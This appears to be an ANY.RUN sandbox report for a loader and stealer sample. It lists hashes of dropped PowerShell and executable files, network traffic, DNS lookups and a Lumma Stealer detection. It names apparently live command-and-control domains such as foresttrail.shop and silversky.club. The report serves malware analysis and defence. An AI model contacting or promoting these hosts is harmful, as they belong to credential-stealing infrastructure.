56962024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exeC:\Users\admin\AppData\Local\Temp\FV7G1B3794XBRS1N5K65T1TJPK.ps1text
MD5:909DABB4B6591DDCBE2DF0395650DCCA
SHA256:2A29C9904D1860EA3177DA7553C8B1BF1944566E5BC1E71340D9E0FF079F0BD3
56962024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exeC:\Users\admin\AppData\Local\Temp\LNOKOK7ULD2D9QRT.exehtml
MD5:46DD133EE00DC1BAE5E4EEBA7B88432F
SHA256:9EB52EE46C7AB5EA4CA0982415DA99FDED1B7D7354F75E50847BDAE6CB44EB66
2040powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_p1ol03i2.ajj.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
56962024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exeC:\Users\admin\AppData\Local\Temp\KLF1UAJT1APXUZQG55I8RRRQYR.ps1text
MD5:EB8A82CF3676AEB10AF460E8A5049BE5
SHA256:B7E1DD2A46E27759D538B5A7C76BE23A8010FA5322E093259FA6100B10CF7D14
2040powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_32jytxdb.2wt.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1920powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bkjewxrv.bgp.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2040powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:B6B36C1CF9C23D33D34BCDFFA440B802
SHA256:B484E946EF1102BEDE0ABD15476262BD2AAF9E651BD87993C48DA929DDA7CC10
2040powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4zqhghep.304.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
21
TCP/UDP connections
30
DNS requests
14
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5544
RUXIMICS.exe
GET
200
2.16.164.9:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4932
svchost.exe
GET
200
2.16.164.9:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5544
RUXIMICS.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4932
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
2.16.164.9:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
POST
200
188.114.97.3:443
https://foresttrail.shop/api
unknown
text
15 b
malicious
POST
200
188.114.96.3:443
https://foresttrail.shop/api
unknown
text
15 b
malicious
POST
200
188.114.97.3:443
https://foresttrail.shop/api
unknown
text
15 b
malicious
POST
200
188.114.97.3:443
https://foresttrail.shop/api
unknown
text
2 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
5544
RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
4712
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4932
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2.23.209.182:443
www.bing.com
Akamai International B.V.
GB
whitelisted
4
System
192.168.100.255:138
whitelisted
4712
MoUsoCoreWorker.exe
2.16.164.9:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
5544
RUXIMICS.exe
2.16.164.9:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
4932
svchost.exe
2.16.164.9:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
4712
MoUsoCoreWorker.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 4.231.128.59
whitelisted
www.bing.com
  • 2.23.209.182
  • 2.23.209.187
  • 2.23.209.130
  • 2.23.209.133
whitelisted
google.com
  • 216.58.212.174
whitelisted
crl.microsoft.com
  • 2.16.164.9
  • 2.16.164.49
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
foresttrail.shop
  • 188.114.97.3
  • 188.114.96.3
unknown
pastebin.com
  • 104.20.3.235
  • 172.67.19.24
  • 104.20.4.235
shared
cdn1.pixel-story.shop
  • 172.67.185.54
  • 104.21.32.85
unknown
silversky.club
  • 104.21.58.9
  • 172.67.167.196
malicious
zasa.r2cloudmikudau8.shop
  • 104.21.6.29
  • 172.67.154.155
unknown

Threats

PID
Process
Class
Message
5696
2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe
A Network Trojan was detected
STEALER [ANY.RUN] Lumma Stealer TLS Connection
2192
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Online Pastebin Text Storage
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch